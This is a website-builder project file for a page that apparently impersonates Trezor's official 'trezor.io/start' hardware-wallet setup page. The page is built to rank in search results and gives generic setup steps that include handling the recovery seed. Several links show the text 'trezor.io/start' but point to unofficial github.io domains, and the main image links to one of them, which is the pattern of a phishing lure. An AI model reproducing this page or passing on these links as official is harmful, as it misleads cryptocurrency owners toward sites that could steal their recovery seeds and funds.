{
  "settings": {
    "name": "trezor io start",
    "currentPage": "index.html",
    "theme": {
      "name": "startm5",
      "title": "StartM5",
      "titlePreset": "StartM5",
      "styling": {
        "primaryColor": "#0c2c68",
        "secondaryColor": "#ffd7ef",
        "successColor": "#3a341c",
        "infoColor": "#320707",
        "warningColor": "#a0e2e1",
        "dangerColor": "#ffea64",
        "mainFont": "Inter Tight",
        "display1Font": "Inter Tight",
        "display1Size": "2",
        "display2Font": "Inter Tight",
        "display2Size": "2",
        "display5Font": "Inter Tight",
        "display5Size": 2,
        "display7Font": "Inter Tight",
        "display7Size": "1",
        "display4Font": "Inter Tight",
        "display4Size": "1",
        "isRoundedImages": true,
        "isRoundedButtons": true,
        "isLargeButtons": true,
        "isGhostButtonBorder": true,
        "underlinedLinks": false,
        "isAnimatedOnScroll": false,
        "isScrollToTopButton": false
      },
      "additionalSetColors": []
    },
    "path": "@PROJECT_PATH@",
    "versionFirst": "5.9.18",
    "siteFonts": [
      {
        "css": "'Inter Tight', sans-serif",
        "name": "Inter Tight",
        "url": "https://fonts.googleapis.com/css?family=Inter+Tight:100,200,300,400,500,600,700,800,900,100i,200i,300i,400i,500i,600i,700i,800i,900i"
      }
    ],
    "favicon": "@PROJECT_PATH@/assets/images/trezor-logo.png",
    "imageResize": true,
    "usedWebp": true,
    "robotsSwitcher": true,
    "robotsText": "User-agent: *\nDisallow:\n\n# Directives for specific search engines\nUser-agent: Googlebot\nAllow: /\n\nUser-agent: Bingbot\nAllow: /\n\n# Allow all search engines to crawl the specific page\nUser-agent: *\nAllow: /start\nAllow: /trezor.io/start",
    "mbrsiteDomain": "pncpyxjahz",
    "sitemapSwitcher": false,
    "sitemapSwitcherAuto": false,
    "siteUrl": false,
    "cookiesAlert": false,
    "gdpr": false,
    "uniqCompNum": 2,
    "versionPublish": "5.9.18"
  },
  "pages": {
    "index.html": {
      "settings": {
        "main": true,
        "title": "Trezor.io/Start® - Starting® Up Your Device",
        "meta_descr": "Trezor.io/start - Get download, install, and setup your trezor io account. just visit our website and follow step by step process trezor.io.",
        "header_custom": "",
        "footer_custom": "",
        "html_before": "",
        "meta_image": "@PROJECT_PATH@/assets/images/trezoriostart.png"
      },
      "components": [
        {
          "alias": false,
          "_styles": {
            "background-color": "@bgColor",
            "padding-top": "(@paddingTop * 15px)",
            "padding-bottom": "(@paddingBottom * 15px)",
            "img": {
              "object-fit": "contain",
              "border-radius": "0 !important"
            }
          },
          "_name": "image04",
          "_sourceTheme": "startm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"image03\" group=\"Image & Video\">\n    <mbr-parameters>\n        <header>Size</header>\n        <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" value=\"0\" step=\"1\">\n        <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" value=\"0\" step=\"1\">\n        <header>Show/Hide</header>\n        <input type=\"checkbox\" title=\"Caption\" name=\"showText\">\n        <header>Background</header>\n        <input type=\"color\" title=\"Color\" name=\"bgColor\" value=\"#ffffff\">\n    </mbr-parameters>\n\n    <div class=\"image-block m-auto\">\n        <a href=\"https://auth-starttrezor.github.io/\"><img src=\"@PROJECT_PATH@/assets/images/trezoriostart.png\" alt=\"trezor io start\"></a>\n        <div mbr-if=\"showText\">\n            <p class=\"mbr-text mt-4 pb-4 align-center mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".mbr-text\">\n                Unlock your true path!\n            </p>\n        </div>\n    </div>\n</section>",
          "_cid": "ugGsxcGFKs",
          "_anchor": "image04-0",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {}
        },
        {
          "alias": false,
          "_styles": {
            "padding-top": "(@paddingTop * 1rem)",
            "padding-bottom": "(@paddingBottom * 1rem)",
            "background-color": "@bgColor",
            ".mbr-text": {
              "color": "#000000"
            },
            ".mbr-section-subtitle": {
              "color": "#000000"
            },
            ".mbr-section-title": {
              "color": "#000000"
            }
          },
          "_name": "article12",
          "_sourceTheme": "startm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"article12\" group=\"Article\">    \n    <mbr-parameters>\n        <header>Size</header>\n        <input type=\"checkbox\" title=\"Full Width\" name=\"fullWidth\">\n        <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" step=\"1\" value=\"1\">\n        <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" step=\"1\" value=\"1\">\n        <input type=\"range\" name=\"textWidth\" title=\"Width\" min=\"4\" max=\"12\" value=\"11\" step=\"1\">\n        <header>Show/Hide</header>\n        <input type=\"checkbox\" title=\"Title\" name=\"showTitle\" checked>\n        <input type=\"checkbox\" title=\"Subtitle\" name=\"showSubtitle\">\n        <input type=\"checkbox\" title=\"Text\" name=\"showText\" checked>\n        <header>Background</header>\n        <input type=\"color\" title=\"Color\" name=\"bgColor\" value=\"#ffffff\">\n    </mbr-parameters>\n    <div mbr-class=\"{'container': !fullWidth, 'container-fluid': fullWidth}\">\n        <div class=\"row justify-content-center\">\n            <div class=\"col-md-12 col-lg-{{textWidth}}\">\n                <h3 class=\"mbr-section-title mbr-fonts-style mb-4 mt-0\" mbr-if=\"showTitle\" data-app-selector=\".mbr-section-title\" mbr-theme-style=\"display-2\"><b><b>Trezor.io/Start</b>® | Trezor Suite | Trezor Bridge | Trezor Wallet</b></h3>\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-4\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\">The storytelling magic of photos\n                </h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-if=\"showText\" data-app-selector=\".mbr-text\" mbr-theme-style=\"display-7\">To set up a Trezor device using trezor.io/start, follow these steps. First, visit <a href=\"https://help-trezor-start.github.io/\" class=\"text-primary\"><b>trezor.io/start</b></a> on your browser. Second, choose your Trezor model. Third, install Trezor Bridge if prompted. Fourth, connect your Trezor device to your computer using the USB cable. Finally, follow the on-screen instructions to complete the setup process.<br><br>To download the Trezor Suite, start by visiting the official <a href=\"https://trezor.io/start\" class=\"text-primary\"><b>https://trezor.io/start</b></a> website. Next, navigate to the Trezor Suite section. Then, select the appropriate version for your operating system (Windows, macOS, or Linux). After that, download the installation file. Lastly, run the downloaded file to install the Trezor Suite on your computer.<br><br>To set up the <a href=\"https://suite.trezor.io/web/\" class=\"text-primary\"><b>https://suite.trezor.io/web/</b></a>, open the installed application. Then, connect your Trezor device to your computer. Next, follow the on-screen prompts to pair your device with the Trezor Suite. After that, set up a new wallet or recover an existing one using your recovery seed. Finally, customize your settings and preferences within the Trezor Suite.<br><br>To create a wallet using your Trezor device, start by opening the Trezor Suite application. Then, connect your Trezor device to your computer. Next, choose the option to create a new wallet. Follow the on-screen instructions to generate a new recovery seed. After that, write down your recovery seed and store it in a safe place. Finally, confirm the seed by re-entering it as prompted.<br><br>To install Trezor Bridge, begin by visiting <a href=\"https://help-trezor-start.github.io/\" class=\"text-primary\"><b>trezor.io/start</b></a> and selecting your Trezor model. Next, download the Trezor Bridge installation file for your operating system. After the download completes, run the installation file. Follow the prompts to install Trezor Bridge on your computer. Finally, restart your computer if prompted to complete the installation process.</p>\n            </div>\n        </div>\n    </div>\n</section>",
          "_cid": "ugGt1C4ZSr",
          "_anchor": "article12-1",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {}
        }
      ]
    }
  }
}